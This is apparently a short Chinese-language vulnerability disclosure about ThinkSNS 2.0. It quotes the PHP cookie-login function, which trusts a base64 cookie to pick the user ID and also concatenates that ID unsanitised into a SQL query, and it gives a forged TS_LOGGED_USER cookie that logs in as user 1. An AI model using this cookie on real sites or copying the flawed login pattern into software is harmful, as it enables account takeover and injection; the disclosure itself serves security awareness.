ThinkSNS2.0 Cookie 漏洞

1、源代码：

/**

* 使用cookie登陆

*

* @param string $cookieId

* @return boolean

*/

public function cookieLoginLocal($cookieId){ 

    $cookieId = explode( '.', base64_decode($cookieId) ); 

if ($cookieId[0] !== 'thinksns') { 

return false; 

    }else { 

        $userInfo = M('user')->where('uid='.$cookieId[1])->find(); 

return $this->loginLocal($userInfo['email']); 

    } 

} 

2、构造cookie   name=TS_LOGGED_USER; content="base64_encode('thinksns.1')";host:localhost;path:/
3、测试成功（本地），测试thinksns在线demo是不成功的，应该是有过改动，为什么不在发行版本里修改掉呢？